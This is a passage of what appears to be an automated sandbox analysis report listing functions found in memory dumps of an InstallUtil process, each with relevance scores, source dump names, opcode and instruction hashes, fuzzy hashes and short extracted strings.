                                                        • Instruction Fuzzy Hash: CC81C474E11258DFDB14DFA9D984A9EFBF2BF89300F149069E819AB365DB305981CF10
                                                        Function 0127CA42 Relevance: 6.4, Strings: 5, Instructions: 183COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: e90f731430897731e419ccddeccc65c8d24542e9f684402749952875f4585718
                                                        • Instruction ID: 1e8b1648f911ab9c181b69982f060df0ae6bc713ebc7cac4eb12d0d2e759169b
                                                        • Opcode Fuzzy Hash: e90f731430897731e419ccddeccc65c8d24542e9f684402749952875f4585718
                                                        • Instruction Fuzzy Hash: 3D81A274E10219CFDB14DFAAD994A9EBBF2BF88300F149069E809AB365DB309941DF50
                                                        Function 0127BAC2 Relevance: 6.4, Strings: 5, Instructions: 182COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 02f7ad3fcca0fec76fa13f602238900c2711ec93f9f1fc2850b45db40d78b6b6
                                                        • Instruction ID: 6203c4d5ecfe43260c06a5f62b3e839c6d7fedd485c9e04c9e8d998bdd21e61e
                                                        • Opcode Fuzzy Hash: 02f7ad3fcca0fec76fa13f602238900c2711ec93f9f1fc2850b45db40d78b6b6
                                                        • Instruction Fuzzy Hash: 0781A574E10218DFDB14DFAAD984A9EBBF2BF88300F14D069E409AB365DB709981DF50
                                                        Function 0127C457 Relevance: 6.4, Strings: 5, Instructions: 177COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$LjVp$LjVp$PHsq$PHsq
                                                        • API String ID: 0-1434930255
                                                        • Opcode ID: 045b23afd08813f6bad92f4b7c8bb68bf8939faae8270cc70b1e9be475836680
                                                        • Instruction ID: 841bec92cc1d5554c6886d21d48229053a94016368f252b6ff769e123fd4b2e8
                                                        • Opcode Fuzzy Hash: 045b23afd08813f6bad92f4b7c8bb68bf8939faae8270cc70b1e9be475836680
                                                        • Instruction Fuzzy Hash: 6281A4B4E10219DFDB14DFA9D984A9EFBF2BF89300F149069E809AB365DB319941CF50
                                                        Function 0127C480 Relevance: 3.9, Strings: 3, Instructions: 151COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$PHsq$PHsq
                                                        • API String ID: 0-255689168
                                                        • Opcode ID: 18e7bfaf85473709f6bd667bf8430ed770aac33f9a31764dded06c290972eecb
                                                        • Instruction ID: c31ee3800f940a404b462c1baecfc47dc87bcfddb1a13761e0a8441509c51495
                                                        • Opcode Fuzzy Hash: 18e7bfaf85473709f6bd667bf8430ed770aac33f9a31764dded06c290972eecb
                                                        • Instruction Fuzzy Hash: B261E9B4E002099FDB14DFAAD984A9EFBF2BF88300F14D069D409AB365DB355942CF50
                                                        Function 0127B502 Relevance: 3.9, Strings: 3, Instructions: 150COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp$PHsq$PHsq
                                                        • API String ID: 0-255689168
                                                        • Opcode ID: 4003a4e97d1a377a88d43bef9c493bc3c3be584935b611468f7edbfad58718bf
                                                        • Instruction ID: 484c2cb548699c7ef3eb3d17572ff87624aa5d508afa8559d14533ce56ab02f3
                                                        • Opcode Fuzzy Hash: 4003a4e97d1a377a88d43bef9c493bc3c3be584935b611468f7edbfad58718bf
                                                        • Instruction Fuzzy Hash: 9061C775E102089FDB18DFAAD994A9EFBF2BF88300F14C069E519AB365DB345942CF50
                                                        Function 01279868 Relevance: 3.4, Strings: 2, Instructions: 850COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$4'sq
                                                        • API String ID: 0-2651803416
                                                        • Opcode ID: 435b6c769392a46c60154b90662aaa461eb5757406cd8c2c13b268d7d0f98eac
                                                        • Instruction ID: e0ba652cc096a68a71593cfa9c04e4b70fd8a4635b8a0027cf5a0799bd22d67f
                                                        • Opcode Fuzzy Hash: 435b6c769392a46c60154b90662aaa461eb5757406cd8c2c13b268d7d0f98eac
                                                        • Instruction Fuzzy Hash: D872A131A1020ADFDF15CF68C884AAEBBF2FF88364F198559E9059B365D770E981CB50
                                                        Function 01276120 Relevance: 3.0, Strings: 2, Instructions: 509COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (osq$Hwq
                                                        • API String ID: 0-1668724233
                                                        • Opcode ID: 859b7fde65888b541f818dd09ba9e48d6acb80024750dadcc3d87af7443835c9
                                                        • Instruction ID: 8b312a3f58edac6e5ff20de421b455bfb935a69f70f18cc40bbda3bf54d828f3
                                                        • Opcode Fuzzy Hash: 859b7fde65888b541f818dd09ba9e48d6acb80024750dadcc3d87af7443835c9
                                                        • Instruction Fuzzy Hash: 42128E70A106198FDB19DFA9C894AAFBBB6FF88300F248559E605DB391DF349D42CB50
                                                        Function 01273572 Relevance: 2.9, Strings: 2, Instructions: 432COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Xwq$$sq
                                                        • API String ID: 0-2558833440
                                                        • Opcode ID: a8ed996b051edcb23cf517f2a2a8fc4a449e9e99591df4371cc23fd2da8e2402
                                                        • Instruction ID: eb6d77545169ec7e190593c1db727dbcb77f9d8f0d6187d03e955cd9332b7fed
                                                        • Opcode Fuzzy Hash: a8ed996b051edcb23cf517f2a2a8fc4a449e9e99591df4371cc23fd2da8e2402
                                                        • Instruction Fuzzy Hash: C6F15A75E102599FCB08DFB9D8955AEBBB2BF89300B14842EE806AB354DF359C02DB51
                                                        Function 06618C51 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHsq$PHsq
                                                        • API String ID: 0-3507005907
                                                        • Opcode ID: f98e25589d1f6a5a58198649a3e6c8bbcbacc74ef6a68940c95e819b87595879
                                                        • Instruction ID: 6018ff96aff7e505fe437dedeae9d07ac92a35f98ec91e8408ceca16baf99aeb
                                                        • Opcode Fuzzy Hash: f98e25589d1f6a5a58198649a3e6c8bbcbacc74ef6a68940c95e819b87595879
                                                        • Instruction Fuzzy Hash: 0181C1B0E00218CFDB58DFAAD984BDDBBB2BF89300F24816AD419AB354DB345946CF40
                                                        Function 066111A0 Relevance: .7, Instructions: 745COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2b750339ed391608e60077aefb7541d4c06cc57f79a64067c1e1221566414a9
                                                        • Instruction ID: 149088ea0ebd41ff07866a49e99b4021f190e9c2e02147d5698e01cf2a86a592
                                                        • Opcode Fuzzy Hash: c2b750339ed391608e60077aefb7541d4c06cc57f79a64067c1e1221566414a9
                                                        • Instruction Fuzzy Hash: 67828E74E012289FDB64DF69CC94BDDBBB2BB89300F1481EA950DA7265DB315E81CF41
                                                        Function 0127F017 Relevance: .7, Instructions: 714COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fbafa46eaff8d4a669cfc043bc973b502341166615dde49e62dc25a1b5bcd83e
                                                        • Instruction ID: d47c965070642bae1a84b5193d3b9d6688f9178e80198fe511e5fd9ba9b23bfe
                                                        • Opcode Fuzzy Hash: fbafa46eaff8d4a669cfc043bc973b502341166615dde49e62dc25a1b5bcd83e
                                                        • Instruction Fuzzy Hash: 6A72D074E152298FDB64DF69C990BEABBB2BB49300F1491E9D418A7355E7309EC1CF40
                                                        Function 06613730 Relevance: .7, Instructions: 677COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 321c18d260ac0d79f821b050ab5356ea528fbe7105f5ee6949b29719e990e318
                                                        • Instruction ID: 0b5f5682195d87ed1acbf847e9adadea71769a9adb046c85abf7e93319a73f87
                                                        • Opcode Fuzzy Hash: 321c18d260ac0d79f821b050ab5356ea528fbe7105f5ee6949b29719e990e318
                                                        • Instruction Fuzzy Hash: F3729C74E012289FDB65DF69CD94BDEBBB2BB89300F1480E9A50DA7264DB315E81CF41
                                                        Function 06618608 Relevance: .3, Instructions: 296COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 70bf137caa7565ff2d87d6bb9aa0347cb2ad04b1cbe5b909be6f5e4928039f00
                                                        • Instruction ID: 668239ab3265b7222274353d9196de184f42530c537d4f1751e0e3b36e6ed073
                                                        • Opcode Fuzzy Hash: 70bf137caa7565ff2d87d6bb9aa0347cb2ad04b1cbe5b909be6f5e4928039f00
                                                        • Instruction Fuzzy Hash: 69E1C4B4E01218CFEB54DFA5D984B9DBBB2BF49304F2081AAD408AB394DB355E85CF51
                                                        Function 0661D670 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 15b02a8cf5119768a09ff8c21ad98027340d4cbd7e602cd3b79bcb5aa9e9de7e
                                                        • Instruction ID: 595593d6f56ca5ee3081398ad735074b2e6449c9c5d3b23ce63f03664c4c00fe
                                                        • Opcode Fuzzy Hash: 15b02a8cf5119768a09ff8c21ad98027340d4cbd7e602cd3b79bcb5aa9e9de7e
                                                        • Instruction Fuzzy Hash: 61A1A375E012188FEB68CF6AC944B9DFBF2AF89300F14D0AAD409AB251DB345A85CF50
                                                        Function 0661B6E8 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0f657fb27e9639cd653177e92784c677d44360e2d29e41bf8a00cfe6075bca71
                                                        • Instruction ID: 6d158aef216a8fd7fb7d450fb8ae7b5cac99522e8bfea843b3b3b0b13f8a3f57
                                                        • Opcode Fuzzy Hash: 0f657fb27e9639cd653177e92784c677d44360e2d29e41bf8a00cfe6075bca71
                                                        • Instruction Fuzzy Hash: 6DA19275E012188FEB68CF6AD944B9DFBF2AF89300F14C0AAD409AB255DB345A85CF51
                                                        Function 0661C388 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb603682c1908800de3bbac80fff3fcb54ff9fb50b0ad6e93802a3ff3dee88ea
                                                        • Instruction ID: 4ab236722ab6642f0af126b5dcc7445d4bb9f420ec242227298e24d5bfbd1194
                                                        • Opcode Fuzzy Hash: bb603682c1908800de3bbac80fff3fcb54ff9fb50b0ad6e93802a3ff3dee88ea
                                                        • Instruction Fuzzy Hash: 78A1A3B5E012188FEB68CF6AD944B9DFBF2AF89300F14D0AAD40DA7251DB345A85CF51
                                                        Function 0661A408 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4fd6aede797b12edafa5a8372c475e953e308c678a4dbed937edea7641e8f2b4
                                                        • Instruction ID: 46194ee1f16d84792bb6a73bb7659850be68ccc8693500754aec8ba311f56c54
                                                        • Opcode Fuzzy Hash: 4fd6aede797b12edafa5a8372c475e953e308c678a4dbed937edea7641e8f2b4
                                                        • Instruction Fuzzy Hash: DFA193B5E012188FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF51
                                                        Function 0661BD38 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9887d5544dbc941bc357c4919df97da74874a0f9068dec0c0aa1327209e457bc
                                                        • Instruction ID: 952df1ebd420f4a7ab3a5e8499f41386c646c2623a23b7f1e4cbd092cc91de86
                                                        • Opcode Fuzzy Hash: 9887d5544dbc941bc357c4919df97da74874a0f9068dec0c0aa1327209e457bc
                                                        • Instruction Fuzzy Hash: 52A18375E012188FEB68CF6AD944B9DFBF2BF89300F14C0AAD409AB255DB345A85CF51
                                                        Function 0661C9D8 Relevance: .2, Instructions: 219COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9f9d65e5d5b0fefaffed8b585fa5d9e0686030c68f33406927e182fc841e6676
                                                        • Instruction ID: 7d5fcca91f97030439dfa8ba902764b251e0e906841edf6621b48e70b0c7e6fa
                                                        • Opcode Fuzzy Hash: 9f9d65e5d5b0fefaffed8b585fa5d9e0686030c68f33406927e182fc841e6676
                                                        • Instruction Fuzzy Hash: B0A1A5B5E012188FEB68CF6AD944B9DFBF2AF89300F14D0AAD40DA7251DB345A85CF51
                                                        Function 0661AA58 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d84b3a3f9706950ff352e2e9ea27739a9e35b2324b698d580d0d4ab902ecd5eb
                                                        • Instruction ID: cb06447aa28149b39a4a901fc9535c05445413449c0d52efa9239e6d1dfba82e
                                                        • Opcode Fuzzy Hash: d84b3a3f9706950ff352e2e9ea27739a9e35b2324b698d580d0d4ab902ecd5eb
                                                        • Instruction Fuzzy Hash: 34A19375E016188FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF51
                                                        Function 0661D028 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a77f93febf6ab1e027ba3058f9fdbb53466eb6e606c33dcffebd82383f8dff0c
                                                        • Instruction ID: 7d0c46fc26c4ae2acf30c12a54b0959ca4d6f5afe5206bb13fda97032690762f
                                                        • Opcode Fuzzy Hash: a77f93febf6ab1e027ba3058f9fdbb53466eb6e606c33dcffebd82383f8dff0c
                                                        • Instruction Fuzzy Hash: 3BA19375E012188FEB68CF6AD944B9DFBF2AF89300F14C0AAD40CA7255DB345A85CF51
                                                        Function 0661B0A0 Relevance: .2, Instructions: 218COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0b2f804a6e0ec3472f599bce3b32935f52c4773282435fd151f5cbeed0245f14
                                                        • Instruction ID: 2bc0c55c1a0fb9c5cdecd58d62cae68b8bd210830f9bfdd890ec78eb8bed255d
                                                        • Opcode Fuzzy Hash: 0b2f804a6e0ec3472f599bce3b32935f52c4773282435fd151f5cbeed0245f14
                                                        • Instruction Fuzzy Hash: 1FA1A275E012188FEB68CF6AC944B9DFBF2BF89300F14C0AAD408AB255DB345A85CF51
                                                        Function 06611191 Relevance: .2, Instructions: 178COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f9d41518f49d3dcd698bd6821a597569f158fc8a74d6ebb32fe8a6cb2f90dcf9
                                                        • Instruction ID: ae6d7e6f3030cef62dc9c8cbaa996d5dc16dc00a41a5fb9e5aba4ad2b7a7729d
                                                        • Opcode Fuzzy Hash: f9d41518f49d3dcd698bd6821a597569f158fc8a74d6ebb32fe8a6cb2f90dcf9
                                                        • Instruction Fuzzy Hash: BB81AE74E412299FDB65DF69DC81BDDBBB2BB89300F1480EAD909A7254DB305E81CF40
                                                        Function 0661D018 Relevance: .2, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6102caead45244bd2e827d99a168454f8acc84bc7dcab26ab8d666828b59f3b2
                                                        • Instruction ID: 1450b778a07aa33e9fe47aa7ef6340898c6b5dbbdc1db5d5ebd58273b51cd07e
                                                        • Opcode Fuzzy Hash: 6102caead45244bd2e827d99a168454f8acc84bc7dcab26ab8d666828b59f3b2
                                                        • Instruction Fuzzy Hash: CE717571E016188FEB68CF6AC944BDEFAF2AF89300F14C1AAD40DA7255DB345A85CF51
                                                        Function 0661B08F Relevance: .2, Instructions: 169COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ecbfa203035301a21e2942120e4cc0eedc6944d387bf075b2330ae3816d068e4
                                                        • Instruction ID: 809615c3c3932821f6f3e21118d338dd34c5733a070bd8e6ffeb52e27bad3924
                                                        • Opcode Fuzzy Hash: ecbfa203035301a21e2942120e4cc0eedc6944d387bf075b2330ae3816d068e4
                                                        • Instruction Fuzzy Hash: F5719671E016188FEB68CF6AC944B9EFBF2AF89300F14C0AAD40DA7255DB345A85CF51
                                                        Function 0661AA48 Relevance: .2, Instructions: 167COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: be6f8c99f4c9326178c77aa042a612b84edef1b9c053f13994f8268eb5b25162
                                                        • Instruction ID: 7acadad62e2ed047c378a9d0910c78e7b0d09134c4313ad8130a5551a8ba2678
                                                        • Opcode Fuzzy Hash: be6f8c99f4c9326178c77aa042a612b84edef1b9c053f13994f8268eb5b25162
                                                        • Instruction Fuzzy Hash: A87184B5E016188FEB68CF6AC944B9DFBF2AF89300F14C0AAD40DA7255DB345A85CF51
                                                        Function 0661C378 Relevance: .1, Instructions: 123COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 387153b885c34c7b64e2560d67f35f88c205fb7ec895ecdb6130353799511e69
                                                        • Instruction ID: 64e599ac32b8794d1cdd8f1e94ff6dbf5c4ee15dcbd6faa22e2de12e9958076a
                                                        • Opcode Fuzzy Hash: 387153b885c34c7b64e2560d67f35f88c205fb7ec895ecdb6130353799511e69
                                                        • Instruction Fuzzy Hash: 47519AB1D016189BEB58CF6BCD457CAFAF7AFC9304F04C0AAD40CA6255DB740A868F51
                                                        Function 0661C9C8 Relevance: .1, Instructions: 122COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9d9ceecf476375aab42843e6c5948f6ad0761a538e93a27a402cfa307dcd9632
                                                        • Instruction ID: 34186b3b1534c76208264fd472a4511c206f4afb9ac516d162ae77ccb27e60e9
                                                        • Opcode Fuzzy Hash: 9d9ceecf476375aab42843e6c5948f6ad0761a538e93a27a402cfa307dcd9632
                                                        • Instruction Fuzzy Hash: 2D518CB1E016189BEB58CF6BDD457D9FAF3AFC9310F04C0AAD50CA6254DB7409858F51
                                                        Function 06618602 Relevance: .1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: baa78ccbd1cf77aafaec0685d70eb80cf6044edc8a53040dbeac7b014c3f0297
                                                        • Instruction ID: 9ab0942370c0b6ccdb220351478cbd6f3b1188bea94b1deb310826f30c751c43
                                                        • Opcode Fuzzy Hash: baa78ccbd1cf77aafaec0685d70eb80cf6044edc8a53040dbeac7b014c3f0297
                                                        • Instruction Fuzzy Hash: 9941D5B1D002088BEB58DFAAD9547DEFBB2BF88300F14C06AD418BB254DB755946CF54
                                                        Function 0661BD28 Relevance: .1, Instructions: 114COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f72064b5e9eaba3a35343ddc8f655ee6acc9aa0b0fc8af7c5a0ffd21c085bd68
                                                        • Instruction ID: 50a01eeda3fef2aca7b46946e698639474d8c67042ba867fa4b1efc7871d315e
                                                        • Opcode Fuzzy Hash: f72064b5e9eaba3a35343ddc8f655ee6acc9aa0b0fc8af7c5a0ffd21c085bd68
                                                        • Instruction Fuzzy Hash: 1C417CB1D016189BEB58CF6BDD457CAFAF7AFC8310F14C0AAD50CA6254EB740A868F50
                                                        Function 0661A3F8 Relevance: .1, Instructions: 111COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76bf640047f1263c7c413e607d203f6492a6ed08488d791c06da3244912c6476
                                                        • Instruction ID: 509c8420e9e3085f3aede0a227e96107eadcd92f7e85f6b5daab1af6a3e50440
                                                        • Opcode Fuzzy Hash: 76bf640047f1263c7c413e607d203f6492a6ed08488d791c06da3244912c6476
                                                        • Instruction Fuzzy Hash: 0D4149B1E016188BEB58CF6BD9457CAFBF3AFC8310F14C1AAD50CA6265DB740A858F51
                                                        Function 0661D662 Relevance: .1, Instructions: 110COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
